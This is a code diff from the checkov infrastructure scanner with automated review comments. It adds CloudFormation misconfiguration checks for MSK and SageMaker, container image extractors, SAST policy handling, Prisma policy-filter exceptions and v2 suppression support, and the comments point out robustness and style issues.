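Review bot: The local variable `logging` in `MSKClusterLogging.scan_resource_conf` shadows the stdlib module name; renaming it, e.g. `broker_logs = conf['Properties']['LoggingInfo']['BrokerLogs']`, avoids confusion if logging is ever imported in this file. `'Enabled' in logging[x]` assumes each of `CloudWatchLogs`/`Firehose`/`S3` is a mapping, so a non-dict value (an intrinsic, a typo) raises `TypeError` instead of failing the check; an `isinstance(logging[x], dict)` guard would keep it a plain FAILED. The `-> Any` return annotation should be `-> CheckResult`, with `conf: dict[str, Any]`.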
@@ -0,0 +1,22 @@
+from typing import Any, List
+
+from checkov.cloudformation.checks.resource.base_resource_negative_value_check import BaseResourceNegativeValueCheck
+from checkov.common.models.enums import CheckCategories
+
+
+class MSKClusterNodesArePrivate(BaseResourceNegativeValueCheck):
+ def __init__(self) -> None:
+ name = "Ensure MSK nodes are private"
+ id = "CKV_AWS_291"
+ supported_resources = ['AWS::MSK::Cluster']
+ categories = [CheckCategories.NETWORKING]
+ super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+ def get_inspected_key(self) -> str:
+ return 'Properties/BrokerNodeGroupInfo/ConnectivityInfo/PublicAccess/Type'
+
+ def get_forbidden_values(self) -> List[Any]:
+ return ["SERVICE_PROVIDED_EIPS"]
+
+
+check = MSKClusterNodesArePrivate()
diff --git a/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionEncryption.py b/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionEncryption.py
new file mode 100644
index 00000000000..c240a7f2251
--- /dev/null
+++ b/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionEncryption.py
@@ -0,0 +1,21 @@
+from checkov.cloudformation.checks.resource.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.consts import ANY_VALUE
+from checkov.common.models.enums import CheckCategories
+
+
+class SagemakerDataQualityJobDefinitionEncryption(BaseResourceValueCheck):
+ def __init__(self):
+ name = "Ensure Amazon Sagemaker Data Quality Job uses KMS to encrypt model artifacts"
+ id = "CKV_AWS_367"
+ supported_resources = ["AWS::SageMaker::DataQualityJobDefinition"]
+ categories = [CheckCategories.ENCRYPTION]
+ super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+ def get_inspected_key(self):
+ return 'Properties/DataQualityJobOutputConfig/KmsKeyId'
+
+ def get_expected_value(self):
+ return ANY_VALUE
+
+
+check = SagemakerDataQualityJobDefinitionEncryption()
diff --git a/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionTrafficEncryption.py b/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionTrafficEncryption.py
new file mode 100644
index 00000000000..231e1ae0577
--- /dev/null
+++ b/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionTrafficEncryption.py
@@ -0,0 +1,17 @@
+from checkov.cloudformation.checks.resource.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.enums import CheckCategories
+
+
+class SagemakerDataQualityJobDefinitionTrafficEncryption(BaseResourceValueCheck):
+ def __init__(self):
+ name = "Ensure Amazon Sagemaker Data Quality Job encrypts all communications between instances used for monitoring jobs"
+ id = "CKV_AWS_369"
+ supported_resources = ["AWS::SageMaker::DataQualityJobDefinition"]
+ categories = [CheckCategories.ENCRYPTION]
+ super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+ def get_inspected_key(self):
+ return 'Properties/NetworkConfig/EnableInterContainerTrafficEncryption'
+
+
+check = SagemakerDataQualityJobDefinitionTrafficEncryption()
diff --git a/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionVolumeEncryption.py b/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionVolumeEncryption.py
new file mode 100644
index 00000000000..d1873f032c6
--- /dev/null
+++ b/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionVolumeEncryption.py
@@ -0,0 +1,21 @@
+from checkov.cloudformation.checks.resource.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.consts import ANY_VALUE
+from checkov.common.models.enums import CheckCategories
+
+
+class SagemakerDataQualityJobDefinitionVolumeEncryption(BaseResourceValueCheck):
+ def __init__(self):
+ name = "Ensure Amazon Sagemaker Data Quality Job uses KMS to encrypt data on attached storage volume"
+ id = "CKV_AWS_368"
+ supported_resources = ["AWS::SageMaker::DataQualityJobDefinition"]
+ categories = [CheckCategories.ENCRYPTION]
+ super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+ def get_inspected_key(self):
+ return 'Properties/JobResources/ClusterConfig/VolumeKmsKeyId'
+
+ def get_expected_value(self):
+ return ANY_VALUE
+
+
+check = SagemakerDataQualityJobDefinitionVolumeEncryption()
diff --git a/checkov/cloudformation/checks/resource/aws/SagemakerModelWithNetworkIsolation.py b/checkov/cloudformation/checks/resource/aws/SagemakerModelWithNetworkIsolation.py
new file mode 100644
index 00000000000..2bcdafd8be0
--- /dev/null
+++ b/checkov/cloudformation/checks/resource/aws/SagemakerModelWithNetworkIsolation.py
@@ -0,0 +1,17 @@
+from checkov.cloudformation.checks.resource.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.enums import CheckCategories
+
+
+class SagemakerModelWithNetworkIsolation(BaseResourceValueCheck):
+ def __init__(self):
+ name = "Ensure Amazon SageMaker model uses network isolation"
+ id = "CKV_AWS_370"
+ supported_resources = ["AWS::SageMaker::Model"]
+ categories = [CheckCategories.NETWORKING]
+ super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+ def get_inspected_key(self):
+ return 'Properties/EnableNetworkIsolation'
+
+
+check = SagemakerModelWithNetworkIsolation()
diff --git a/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py b/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py
new file mode 100644
index 00000000000..daf78957202
--- /dev/null
+++ b/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py
@@ -0,0 +1,26 @@
+from typing import List
+
+from checkov.cloudformation.checks.resource.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.consts import ANY_VALUE
+from checkov.common.models.enums import CheckCategories
+
+
+class SagemakerNotebookEncryptedWithCMK(BaseResourceValueCheck):
+ def __init__(self):
+ name = "Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK)"
+ id = "CKV_AWS_187"
+ supported_resources = ("AWS::SageMaker::NotebookInstance", "AWS::SageMaker::Domain")
+ categories = [CheckCategories.ENCRYPTION]
+ super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+ def get_inspected_key(self):
+ return 'Properties/KmsKeyId'
+
+ def get_expected_value(self):
+ return ANY_VALUE
+
+ def get_evaluated_keys(self) -> List[str]:
+ return ['Properties/KmsKeyId']
+
+
+check = SagemakerNotebookEncryptedWithCMK()
diff --git a/checkov/cloudformation/checks/resource/aws/SagemakerNotebookInstanceAllowsIMDSv2.py b/checkov/cloudformation/checks/resource/aws/SagemakerNotebookInstanceAllowsIMDSv2.py
new file mode 100644
index 00000000000..3dc4904b9b4
--- /dev/null
+++ b/checkov/cloudformation/checks/resource/aws/SagemakerNotebookInstanceAllowsIMDSv2.py
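Review bot: `get_evaluated_keys` returns `['Properties/KmsKeyId']`, the same path `get_inspected_key` already returns; if `BaseResourceValueCheck` derives the evaluated keys from the inspected key (likely, since no other value check in this diff overrides it), the override is redundant and can be dropped. `supported_resources` is a tuple here while `categories` is a list; both are accepted, but one style across the new SageMaker checks would read better.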
@@ -0,0 +1,20 @@
+from checkov.cloudformation.checks.resource.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.enums import CheckCategories
+
+
+class SagemakerNotebookInstanceAllowsIMDSv2(BaseResourceValueCheck):
+ def __init__(self):
+ name = "Ensure Amazon SageMaker Notebook Instance only allows for IMDSv2"
+ id = "CKV_AWS_371"
+ supported_resources = ["AWS::SageMaker::NotebookInstance"]
+ categories = [CheckCategories.ENCRYPTION]
+ super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+ def get_inspected_key(self):
+ return 'Properties/InstanceMetadataServiceConfiguration/MinimumInstanceMetadataServiceVersion'
+
+ def get_expected_value(self):
+ return "2"
+
+
+check = SagemakerNotebookInstanceAllowsIMDSv2()
diff --git a/checkov/cloudformation/image_referencer/provider/aws.py b/checkov/cloudformation/image_referencer/provider/aws.py
index 0bb9c2cc521..ca2c95121f5 100644
--- a/checkov/cloudformation/image_referencer/provider/aws.py
+++ b/checkov/cloudformation/image_referencer/provider/aws.py
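Review bot: `SagemakerNotebookInstanceAllowsIMDSv2` is filed under `CheckCategories.ENCRYPTION`, but requiring `MinimumInstanceMetadataServiceVersion` of `"2"` is an instance-metadata hardening control, not encryption; `CheckCategories.GENERAL_SECURITY` (or `NETWORKING`) is the fitting category. The expected value `"2"` relies on the property being parsed as a string; if templates can supply the bare number `2` (not verifiable here), overriding `get_expected_values` to return `["2", 2]` would cover both spellings.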
@@ -88,6 +88,33 @@ def extract_images_from_aws_lightsail_container_service_deployment_version(resou return image_names +def extract_images_from_aws_sagemaker_image_version(resource: dict[str, Any]) -> list[str]: + image_names: list[str] = [] + + image_name = find_in_dict(input_dict=resource, key_path="BaseImage") + if image_name and isinstance(image_name, str): + image_names.append(image_name) + + return image_names + + +def extract_images_from_aws_sagemaker_model(resource: dict[str, Any]) -> list[str]: + image_names: list[str] = [] + + image_name = find_in_dict(input_dict=resource, key_path="PrimaryContainer/Image") + if image_name and isinstance(image_name, str): + image_names.append(image_name) + + containers = find_in_dict(input_dict=resource, key_path="Containers") + if isinstance(containers, list): + for container in containers: + name = container.get("Image") + if name and isinstance(name, str): + image_names.append(name) + + return image_names + + # needs to be at the bottom to add the defined functions SUPPORTED_AWS_IMAGE_RESOURCE_TYPES = { "AWS::AppRunner::Service": extract_images_from_aws_apprunner_service, @@ -95,4 +122,6 @@ def extract_images_from_aws_lightsail_container_service_deployment_version(resou "AWS::CodeBuild::Project": extract_images_from_aws_codebuild_project, "AWS::ECS::TaskDefinition": extract_images_from_aws_ecs_task_definition, "AWS::Lightsail::Container": extract_images_from_aws_lightsail_container_service_deployment_version, + "AWS::SageMaker::ImageVersion": extract_images_from_aws_sagemaker_image_version, + "AWS::SageMaker::Model": extract_images_from_aws_sagemaker_model, } diff --git a/checkov/common/bridgecrew/check_type.py b/checkov/common/bridgecrew/check_type.py index c37b013c525..26c1da0e331 100644 --- a/checkov/common/bridgecrew/check_type.py +++ b/checkov/common/bridgecrew/check_type.py 
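Review bot: In `extract_images_from_aws_sagemaker_model` the loop calls `container.get("Image")` on every element of `Containers`, so a non-dict entry (an unresolved intrinsic or a malformed template) raises `AttributeError` instead of being skipped; guard with `if isinstance(container, dict):` before the `.get`, in line with the `isinstance(containers, list)` check just above it. Both new helpers otherwise follow the shape of the existing extractors, so a one-line docstring per function naming the template path read (`BaseImage`, `PrimaryContainer/Image`, `Containers[*].Image`) is all the documentation they need.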
@@ -35,6 +35,8 @@ class CheckType: SAST_PYTHON = 'sast_python' SAST_JAVA = 'sast_java' SAST_JAVASCRIPT = 'sast_javascript' + SAST_TYPESCRIPT = 'sast_typescript' + SAST_GOLANG = 'sast_golang' POLICY_3D = "3d_policy" @@ -43,6 +45,8 @@ class SastType: SAST_PYTHON = 'sast_python' SAST_JAVA = 'sast_java' SAST_JAVASCRIPT = 'sast_javascript' + SAST_TYPESCRIPT = 'sast_typescript' + SAST_GOLANG = 'sast_golang' # needs to be at the end diff --git a/checkov/common/bridgecrew/code_categories.py b/checkov/common/bridgecrew/code_categories.py index c6a4caaad46..ad18d0bc363 100644 --- a/checkov/common/bridgecrew/code_categories.py +++ b/checkov/common/bridgecrew/code_categories.py @@ -47,6 +47,8 @@ class CodeCategoryType(str, Enum): CheckType.SAST_PYTHON: CodeCategoryType.WEAKNESSES, CheckType.SAST_JAVA: CodeCategoryType.WEAKNESSES, CheckType.SAST_JAVASCRIPT: CodeCategoryType.WEAKNESSES, + CheckType.SAST_TYPESCRIPT: CodeCategoryType.WEAKNESSES, + CheckType.SAST_GOLANG: CodeCategoryType.WEAKNESSES, CheckType.POLICY_3D: CodeCategoryType.IAC } diff --git a/checkov/common/bridgecrew/integration_features/features/custom_policies_integration.py b/checkov/common/bridgecrew/integration_features/features/custom_policies_integration.py index e0f7a67dcba..269c1eb158d 100644 --- a/checkov/common/bridgecrew/integration_features/features/custom_policies_integration.py +++ b/checkov/common/bridgecrew/integration_features/features/custom_policies_integration.py @@ -4,6 +4,7 @@ import logging import re from collections import defaultdict +import tempfile from typing import TYPE_CHECKING, Any, List from checkov.common.bridgecrew.integration_features.base_integration_feature import BaseIntegrationFeature @@ -21,6 +22,8 @@ # service-provider::service-name::data-type-name CFN_RESOURCE_TYPE_IDENTIFIER = re.compile(r"^[a-zA-Z0-9]+::[a-zA-Z0-9]+::[a-zA-Z0-9]+$") +SAST_CATEGORY = 'Sast' +LICENSES_CATEGORY = 'Licenses' class CustomPoliciesIntegration(BaseIntegrationFeature): 
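Review bot: `import tempfile` is inserted between `from collections import defaultdict` and `from typing import ...` in custom_policies_integration.py, splitting the plain-`import` group; it belongs with `import logging` / `import re` in alphabetical order, which is what isort/ruff would produce. The two new module constants `SAST_CATEGORY` and `LICENSES_CATEGORY` would benefit from a short comment saying they are the `category` values the platform returns for policies that are not graph checks, since nothing else in the hunk explains why those two are special-cased.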
@@ -49,9 +52,16 @@ def pre_scan(self) -> None: return policies = self.bc_integration.customer_run_config_response.get('customPolicies') + sast_policies_dir = tempfile.mkdtemp() + self.bc_integration.sast_custom_policies = sast_policies_dir for policy in policies: try: logging.debug(f"Loading policy id: {policy.get('id')}") + if policy.get('category') == SAST_CATEGORY: + with open(f"{sast_policies_dir}/{policy.get('id')}.yaml", 'a') as f: + f.write(policy.get('code')) + continue + converted_check = self._convert_raw_check(policy) source_incident_id = policy.get('sourceIncidentId') if source_incident_id: @@ -59,6 +69,10 @@ def pre_scan(self) -> None: self.bc_cloned_checks[source_incident_id].append(policy) continue resource_types = Registry._get_resource_types(converted_check['metadata']) + + if policy.get('category') == LICENSES_CATEGORY: + continue + check = self.platform_policy_parser.parse_raw_check(converted_check, resources_types=resource_types) check.severity = Severities[policy['severity']] check.bc_id = check.id @@ -70,6 +84,8 @@ def pre_scan(self) -> None: get_graph_checks_registry("terraform").checks.append(check) elif f.lower() == "kubernetes": get_graph_checks_registry("kubernetes").checks.append(check) + elif f.lower() == "bicep": + get_graph_checks_registry("bicep").checks.append(check) elif re.match(CFN_RESOURCE_TYPE_IDENTIFIER, check.resource_types[0]): get_graph_checks_registry("cloudformation").checks.append(check) else: @@ -87,7 +103,8 @@ def _convert_raw_check(policy: dict[str, Any]) -> dict[str, Any]: 'id': policy['id'], 'name': policy['title'], 'category': policy['category'], - 'frameworks': policy.get('frameworks', []) + 'frameworks': policy.get('frameworks', []), + 'scope': {'provider': policy.get('provider', '').lower()} } check = { 'metadata': metadata, 
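Review bot: The SAST policy file name is built directly from `policy.get('id')` — `f"{sast_policies_dir}/{policy.get('id')}.yaml"` — so an id containing path separators would be written outside the temp directory and a missing id yields a file named `None.yaml`; validate the id (e.g. reject it unless it matches a simple identifier pattern, or take `os.path.basename`) before using it as a file name. `f.write(policy.get('code'))` raises `TypeError` when `code` is absent, which the surrounding `try` presumably turns into a logged skip; `policy.get('code') or ''` plus `encoding='utf-8'` on the `open` call would make that explicit. The `mkdtemp` directory is never removed, so every run leaves the customer's SAST policies on disk; registering cleanup (`atexit`, or `shutil.rmtree` once the scan finishes) is worth considering. The `LICENSES_CATEGORY` `continue` runs only after `_convert_raw_check` and `Registry._get_resource_types` have done their work, so moving it next to the SAST check avoids the wasted conversion. `pre_scan` starts outside this hunk.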
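Review bot: `policy.get('provider', '').lower()` in `_convert_raw_check` raises `AttributeError` when the policy carries `provider: null`, because the default only applies to a missing key; `(policy.get('provider') or '').lower()` handles both the missing and the null case. The function's body continues outside the hunk.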
diff --git a/checkov/common/bridgecrew/integration_features/features/fixes_integration.py b/checkov/common/bridgecrew/integration_features/features/fixes_integration.py index 951688d89a7..4baeda0ae40 100644 --- a/checkov/common/bridgecrew/integration_features/features/fixes_integration.py +++ b/checkov/common/bridgecrew/integration_features/features/fixes_integration.py @@ -111,7 +111,8 @@ def _get_fixes_for_file( headers = merge_dicts( get_default_post_headers(self.bc_integration.bc_source, self.bc_integration.bc_source_version), - {"Authorization": self.bc_integration.get_auth_token()} + {"Authorization": self.bc_integration.get_auth_token()}, + self.bc_integration.custom_auth_headers ) if not self.bc_integration.http: diff --git a/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py b/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py index e0fe5a537eb..dc3bbbc594c 100644 --- a/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py +++ b/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py @@ -22,11 +22,13 @@ class PolicyMetadataIntegration(BaseIntegrationFeature): def __init__(self, bc_integration: BcPlatformIntegration) -> None: super().__init__(bc_integration=bc_integration, order=0) self.check_metadata: dict[str, Any] = {} + self.sast_check_metadata: dict[str, Any] = {} self.bc_to_ckv_id_mapping: dict[str, str] = {} self.pc_to_ckv_id_mapping: dict[str, str] = {} self.ckv_id_to_source_incident_id_mapping: dict[str, str] = {} self.severity_key = 'severity' self.filtered_policy_ids: list[str] = [] + self.filtered_exception_policy_ids: list[str] = [] def is_valid(self) -> bool: return ( 
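Review bot: `merge_dicts(..., self.bc_integration.custom_auth_headers)` in `_get_fixes_for_file` assumes `custom_auth_headers` is always a mapping; if the attribute can still be `None` before the integration is configured (not visible here), the call would fail, so either default it to `{}` on the integration or pass `self.bc_integration.custom_auth_headers or {}`. `_get_fixes_for_file` starts outside the hunk.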
@@ -39,7 +41,10 @@ def pre_scan(self) -> None: if self.bc_integration.customer_run_config_response: self._handle_customer_run_config(self.bc_integration.customer_run_config_response) if self.bc_integration.is_prisma_integration(): - self._handle_customer_prisma_policy_metadata(self.bc_integration.prisma_policies_response) + # build a list of policy ids included using the --prisma-metadata-filter flag + self._handle_customer_prisma_policy_metadata(self.bc_integration.prisma_policies_response, exclude_policies=False) + # build a list of policy ids excluded using the --prisma-metadata-filter-exception flag + self._handle_customer_prisma_policy_metadata(self.bc_integration.prisma_policies_exception_response, exclude_policies=True) elif self.bc_integration.public_metadata_response: self._handle_public_metadata(self.bc_integration.public_metadata_response) else: 
@@ -141,16 +146,19 @@ def _handle_public_metadata(self, check_metadata: dict[str, Any]) -> None: def _handle_customer_run_config(self, run_config: dict[str, Any]) -> None: self.check_metadata = run_config['policyMetadata'] for ckv_id, pol in self.check_metadata.items(): + if 'SAST' in ckv_id: + self.sast_check_metadata[ckv_id] = pol self.bc_to_ckv_id_mapping[pol['id']] = ckv_id if self.bc_integration.is_prisma_integration() and pol.get('pcPolicyId'): self.pc_to_ckv_id_mapping[pol['pcPolicyId']] = ckv_id # Custom policies are returned in run_config['customPolicies'] rather than run_config['policyMetadata']. if 'customPolicies' in run_config: for custom_policy in run_config['customPolicies']: - if 'guideline' in custom_policy: - self.check_metadata[custom_policy['id']] = { - 'guideline': custom_policy['guideline'] - } + custom_policy_check_metadata = { + 'severity': custom_policy.get('severity'), + 'guideline': custom_policy.get('guideline') + } + self.check_metadata[custom_policy['id']] = {k: v for k, v in custom_policy_check_metadata.items() if v is not None} pc_policy_id = custom_policy.get('pcPolicyId') if pc_policy_id: self.pc_to_ckv_id_mapping[pc_policy_id] = custom_policy['id'] @@ -158,7 +166,8 @@ def _handle_customer_run_config(self, run_config: dict[str, Any]) -> None: if source_incident_id: self.ckv_id_to_source_incident_id_mapping[custom_policy['id']] = source_incident_id - def _handle_customer_prisma_policy_metadata(self, prisma_policy_metadata: list[dict[str, Any]]) -> None: + def _handle_customer_prisma_policy_metadata(self, prisma_policy_metadata: list[dict[str, Any]], exclude_policies: bool) -> None: + policy_ids = list() if isinstance(prisma_policy_metadata, list): for metadata in prisma_policy_metadata: logging.debug(f"Parsing filtered_policy_ids from metadata: {json.dumps(metadata)}") 
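Review bot: `self.check_metadata[custom_policy['id']] = {...}` in `_handle_customer_run_config` now creates an entry for every custom policy, whereas the old code only did so when a `guideline` was present; a policy with neither severity nor guideline gets an empty dict, and any entry of the same id that came from `policyMetadata` is replaced, which changes the outcome of membership checks on `check_metadata` elsewhere. If that is intended, a comment saying so would help; otherwise assign only when the filtered dict is non-empty. `if 'SAST' in ckv_id` is a substring test; a prefix check with the real SAST id prefix (`ckv_id.startswith(...)`) would avoid accidental matches. `policy_ids = list()` in the new signature line is better written as `policy_ids: list[str] = []`.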
@@ -166,12 +175,18 @@ def _handle_customer_prisma_policy_metadata(self, prisma_policy_metadata: list[d if pc_id: ckv_id = self.get_ckv_id_from_pc_id(pc_id) if ckv_id: - self.filtered_policy_ids.append(ckv_id) - self._add_ckv_id_for_filtered_cloned_checks() + policy_ids.append(ckv_id) + if exclude_policies: + self.filtered_exception_policy_ids = policy_ids + self._add_ckv_id_for_filtered_cloned_checks(self.filtered_exception_policy_ids, exclude_policies) + else: + self.filtered_policy_ids = policy_ids + self._add_ckv_id_for_filtered_cloned_checks(self.filtered_policy_ids, exclude_policies) - def _add_ckv_id_for_filtered_cloned_checks(self) -> None: + def _add_ckv_id_for_filtered_cloned_checks(self, policy_ids: list[str], exclude_policies: bool) -> None: """ Filtered checks are the policies that are returned by --policy-metadata-filter. + Filtered exclusion checks are the policies that are returned by --policy-metadata-filter-exclusion. Cloned checks are policies that have modified metadata in Prisma (severity, title etc). Filtered checks do not have a definition if they are cloned, instead they have a sourceIncidentId which corresponds to the BC ID of the original source check. @@ -179,13 +194,13 @@ def _add_ckv_id_for_filtered_cloned_checks(self) -> None: Example: Input: filtered_policy_ids = [ "org_AWS_1609123441" ] - ckv_id_to_source_incident_id_mapping = { "org_AWS_1609123441": "BC__AWS_GENERAL_123" } - bc_id_to_ckv_id_mapping = { "BC__AWS_GENERAL_123": "CKV_AWS_123" } + ckv_id_to_source_incident_id_mapping = { "org_AWS_1609123441": "BC_AWS_GENERAL_123" } + bc_id_to_ckv_id_mapping = { "BC_AWS_GENERAL_123": "CKV_AWS_123" } Output: filtered_policy_ids = [ "org_AWS_1609123441", "CKV_AWS_123" ] """ ckv_ids = [] - for policy_id in self.filtered_policy_ids: + for policy_id in policy_ids: source_bc_id = self.get_source_incident_id_from_ckv_id(policy_id) if not source_bc_id: continue 
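Review bot: The docstring line added to `_add_ckv_id_for_filtered_cloned_checks` names the flag `--policy-metadata-filter-exclusion`, while the comments added in `pre_scan` call it `--prisma-metadata-filter-exception` and the new parameter on `get_prisma_build_policies` is `policy_filter_exception`; at least one of these is wrong, and a reader grepping for the flag will miss it. Use the CLI's real option name in both places. Separately, both branches in `_handle_customer_prisma_policy_metadata` now assign the list (`self.filtered_policy_ids = policy_ids`) where the removed code appended to it, so any ids placed in `filtered_policy_ids` before this call are discarded — fine if nothing else populates it, but worth a comment. `_handle_customer_prisma_policy_metadata` starts outside this hunk.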
@@ -193,6 +208,9 @@ def _add_ckv_id_for_filtered_cloned_checks(self) -> None: if not ckv_id: continue ckv_ids.append(ckv_id) + if exclude_policies: + self.filtered_exception_policy_ids += ckv_ids + return self.filtered_policy_ids += ckv_ids def pre_runner(self, runner: _BaseRunner) -> None: diff --git a/checkov/common/bridgecrew/integration_features/features/suppressions_integration.py b/checkov/common/bridgecrew/integration_features/features/suppressions_integration.py index 95642b69c33..6dc27691763 100644 --- a/checkov/common/bridgecrew/integration_features/features/suppressions_integration.py +++ b/checkov/common/bridgecrew/integration_features/features/suppressions_integration.py @@ -1,9 +1,10 @@ from __future__ import annotations +import itertools import logging import re from itertools import groupby -from typing import TYPE_CHECKING, Pattern, Any +from typing import TYPE_CHECKING, Pattern, Any, Optional from checkov.common.bridgecrew.check_type import CheckType @@ -14,6 +15,7 @@ from checkov.common.models.enums import CheckResult from checkov.common.output.record import SCA_PACKAGE_SCAN_CHECK_NAME from checkov.common.util.file_utils import convert_to_unix_path +from checkov.common.util.str_utils import removeprefix, align_path if TYPE_CHECKING: from checkov.common.bridgecrew.platform_integration import BcPlatformIntegration @@ -25,6 +27,7 @@ class SuppressionsIntegration(BaseIntegrationFeature): def __init__(self, bc_integration: BcPlatformIntegration) -> None: super().__init__(bc_integration=bc_integration, order=2) # must be after the custom policies integration + self.suppressions_v2: dict[str, list[dict[str, Any]]] = {} self.suppressions: dict[str, list[dict[str, Any]]] = {} # bcorgname_provider_timestamp (ex: companyxyz_aws_1234567891011) 
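Review bot: The `if exclude_policies: ... return` inserted ahead of `self.filtered_policy_ids += ckv_ids` duplicates the append for the two target lists and leaves an early `return` in the middle of the method; selecting the target once reads more directly and keeps the two cases from drifting apart, e.g. `target = self.filtered_exception_policy_ids if exclude_policies else self.filtered_policy_ids` followed by `target.extend(ckv_ids)`. `_add_ckv_id_for_filtered_cloned_checks` starts outside this hunk.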
@@ -51,26 +54,56 @@ def pre_scan(self) -> None: return suppressions = self.bc_integration.customer_run_config_response.get('suppressions') + suppressions_v2 = self.bc_integration.customer_run_config_response.get('suppressionsV2') # currently just SAST for suppression in suppressions: + suppression['isV1'] = True if suppression['policyId'] in metadata_integration.bc_to_ckv_id_mapping: suppression['checkovPolicyId'] = metadata_integration.get_ckv_id_from_bc_id(suppression['policyId']) else: suppression['checkovPolicyId'] = suppression['policyId'] # custom policy + for suppression in suppressions_v2: + suppression['isV1'] = False + checkov_ids = [] + for policy_id in suppression['policyIds']: + if policy_id in metadata_integration.bc_to_ckv_id_mapping: + checkov_ids.append(metadata_integration.bc_to_ckv_id_mapping[policy_id]) + else: + checkov_ids.append(policy_id) # custom policy - not supported yet + suppression['checkovPolicyIds'] = checkov_ids + self._init_repo_regex() suppressions = sorted(suppressions, key=lambda s: s['checkovPolicyId']) # group and map by policy ID self.suppressions = {policy_id: list(sup) for policy_id, sup in groupby(suppressions, key=lambda s: s['checkovPolicyId'])} - logging.debug(f'Found {len(self.suppressions)} valid suppressions from the platform.') - logging.debug('The found suppression rules are:') + + # map suppressions v2 by checkov ID - because the policy IDs are arrays, we need to map each unique ID in each + # suppression's policy ID array to its suppressions + self.suppressions_v2 = SuppressionsIntegration.create_suppression_v2_policy_id_map(suppressions_v2) + + logging.debug('The found suppression v1 rules are:') logging.debug(self.suppressions) + logging.debug('The found suppression v2 rules are:') + logging.debug(self.suppressions_v2) + except Exception: self.integration_feature_failures = True logging.debug("Scanning without applying suppressions configured in the platform.", exc_info=True) + @staticmethod + def 
create_suppression_v2_policy_id_map(suppressions_v2: list[dict[str, Any]]) -> dict[str, list[dict[str, Any]]]: + checkov_id_map: dict[str, list[dict[str, Any]]] = {} + for suppression in suppressions_v2: + for checkov_id in suppression['checkovPolicyIds']: + if checkov_id in checkov_id_map: + checkov_id_map[checkov_id].append(suppression) + else: + checkov_id_map[checkov_id] = [suppression] + return checkov_id_map + def post_runner(self, scan_report: Report) -> None: self._apply_suppressions_to_report(scan_report) 
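Review bot: `suppressions_v2 = ...get('suppressionsV2')` is `None` whenever the run-config response lacks that key, and the new `for suppression in suppressions_v2:` then raises `TypeError`; the surrounding `except Exception` turns that into `integration_feature_failures = True` and a scan with no platform suppressions at all, including the v1 ones that worked before this change. Default it, `suppressions_v2 = self.bc_integration.customer_run_config_response.get('suppressionsV2') or []`, so an older platform response degrades to v1-only behaviour instead of disabling suppressions; the pre-existing `.get('suppressions')` presumably has the same exposure but is not new here. In `create_suppression_v2_policy_id_map`, `checkov_id_map.setdefault(checkov_id, []).append(suppression)` replaces the four-line if/else. The hunk opens at a `return` inside `pre_scan`, whose start is outside the hunk.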
@@ -88,16 +121,22 @@ def _apply_suppressions_to_report(self, scan_report: Report) -> None: check.check_id = 'BC_VUL_1' relevant_suppressions = self.suppressions.get(check.check_id) + relevant_suppressions_v2 = self.suppressions_v2.get(check.check_id) + + has_suppression = relevant_suppressions or relevant_suppressions_v2 - applied_suppression = self._check_suppressions(check, relevant_suppressions) if relevant_suppressions else None + applied_suppression = self._check_suppressions(check, relevant_suppressions, relevant_suppressions_v2) if has_suppression else None if applied_suppression: - suppress_comment = applied_suppression['comment'] - logging.debug(f'Applying suppression to the check {check.check_id} with the comment: {suppress_comment}') - check.check_result = { - 'result': CheckResult.SKIPPED, - 'suppress_comment': suppress_comment - } - scan_report.skipped_checks.append(check) + suppress_comment = applied_suppression['comment'] if applied_suppression['isV1'] else applied_suppression['justificationComment'] + if self._should_omit_check(applied_suppression): + logging.debug(f'Removing check {check.check_id} from the report, comment: {suppress_comment}') + else: + logging.debug(f'Applying suppression to the check {check.check_id} with the comment: {suppress_comment}') + check.check_result = { + 'result': CheckResult.SKIPPED, + 'suppress_comment': suppress_comment + } + scan_report.skipped_checks.append(check) elif check.check_result['result'] == CheckResult.FAILED: still_failed_checks.append(check) else: 
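Review bot: In the new `_should_omit_check` branch the record is neither appended to `scan_report.skipped_checks` nor reaches the `elif`/`else` that rebuild `still_failed_checks`/`still_passed_checks`, so a finding matched by a v2 `policy` rule vanishes from the report with only a `logging.debug` trace. That is presumably the intended meaning of a policy-level suppression, but a reader of the output cannot distinguish a removed finding from one that never fired; a comment such as `# policy-level v2 suppressions drop the record from the report entirely rather than marking it skipped` plus an `info`-level log would make the behaviour auditable. `applied_suppression['justificationComment']` also assumes every v2 suppression carries that key — `.get('justificationComment', '')` is safer if the platform can omit it. `_apply_suppressions_to_report` starts and ends outside this hunk.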
